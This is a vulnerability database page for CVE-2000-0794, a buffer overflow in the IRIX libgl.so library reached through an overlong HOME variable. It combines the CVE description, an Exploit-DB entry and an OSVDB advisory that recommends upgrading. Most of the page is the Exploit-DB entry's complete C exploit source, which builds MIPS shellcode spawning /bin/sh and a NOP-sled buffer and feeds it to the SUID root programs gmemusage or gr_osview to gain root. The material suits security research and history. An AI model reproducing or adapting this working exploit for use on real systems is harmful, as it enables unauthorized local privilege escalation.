ID: CVE-2000-0794
Type: cve
Reporter: cve@mitre.org
Modified: 2008-09-05T20:21:00

## Description
Buffer overflow in IRIX libgl.so library allows local users to gain root privileges via a long HOME variable to programs such as (1) gmemusage and (2) gr_osview.
## Exploit-DB entry EDB-ID:20127

Title: SGI IRIX 6.2 libgl.so Buffer Overflow Vulnerability
Type: exploitdb (bulletinFamily: exploit)
Published: 1997-09-01 | Modified: 1997-09-01 | Last seen: 2016-02-02T13:31:35
CVE list: CVE-2000-0794
CVSS: 7.2 (AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/)
URL: https://www.exploit-db.com/exploits/20127/
Download: https://www.exploit-db.com/download/20127/
Description: SGI IRIX 6.2 libgl.so Buffer Overflow Vulnerability. CVE-2000-0794. Local exploit for irix platform.

Source: http://www.securityfocus.com/bid/1527/info

Certain versions of IRIX ship with a version of libgl.so which is vulnerable to buffer overflow attacks. This library, libgl.so, is used in conjunction with graphical programs which use OpenGL. As a result, a number of programs which utilize libgl.so can be exploited via this problem. The exploit which is in known public circulation at this time uses both gmemusage and gr_osview to exploit this problem. The buffer overflow itself is in how libgl.so handles the $HOME variable (it is not checked for length). Further, the programs which receive this $HOME variable from libgl.so fail to limit its size, resulting in a buffer overflow attack. Should the receiving programs be SUID root (as are both gr_osview and gmemusage), the attacker will gain root access.

```c
/*## copyright LAST STAGE OF DELIRIUM sep 1997 poland *://lsd-pl.net/ #*/
/*## libgl.so $HOME #*/

#define ADRNUM 500
#define PCHNUM 320
#define TMPNUM 500
#define NOPNUM 740
#define ALLIGN 3

char shellcode[]=
    "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
    "\x24\x02\x03\xf3" /* li $v0,1011 */
    "\x23\xff\x01\x14" /* addi $ra,$ra,276 */
    "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
    "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */
    "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */
    "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
    "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
    "\x03\xff\xff\xcc" /* syscall */
    "/bin/sh"
;

char jump[]=
    "\x03\xa0\x10\x25" /* move $v0,$sp */
    "\x03\xe0\x00\x08" /* jr $ra */
;

char nop[]="\x24\x0f\x12\x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[2];
    int i,n=-1;

    printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland //lsd-pl.net/\n");
    printf("libgl.so $HOME for irix 6.2 IP:20,22\n\n");

    if(argc!=2){
        printf("usage: %s {gmemusage|gr_osview}\n",argv[0]);
        exit(-1);
    }
    if(!strcmp(argv[1],"gmemusage")) n=0;
    if(!strcmp(argv[1],"gr_osview")) n=1;
    if(n==-1) exit(-1);

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10268+252+824+500;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10268+252+824+31868;
    *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10268;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"HOME=");
    b+=5;
    for(i=0;i<ALLIGN;i++) *b++=0xff;
    for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
    *b++=0xff;
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<ALLIGN;i++) *b++=0xff;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    switch(n){
    case 0: execle("/usr/sbin/gmemusage","lsd",0,envp);
    case 1: execle("/usr/sbin/gr_osview","lsd",0,envp);
    }
}
```

## OSVDB entry OSVDB:8568

Title: IRIX libgl.so HOME Variable Privilege Escalation
Type: osvdb (bulletinFamily: software, edition 1)
Published: 2000-08-02 | Modified: 2000-08-02 | Last seen: 2017-04-28T13:20:03
CVE list: CVE-2000-0794
CVSS: 7.2 (AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/)
URL: https://vulners.com/osvdb/OSVDB:8568

### Vulnerability Description

A local overflow exists in IRIX. The gmemusage and gr_osview programs, which use the libgl.so library, fail to validate the HOME environment variable, resulting in a buffer overflow. With a specially crafted request, an attacker can obtain root privileges, resulting in a loss of integrity.

### Solution Description

Upgrade to version 6.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

### References

Vendor URL: http://www.sgi.com
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2000-07/0461.html
ISS X-Force ID: 5063
Generic Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/libgl.c
CVE: CVE-2000-0794 (https://vulners.com/cve/CVE-2000-0794)
Bugtraq ID: 1527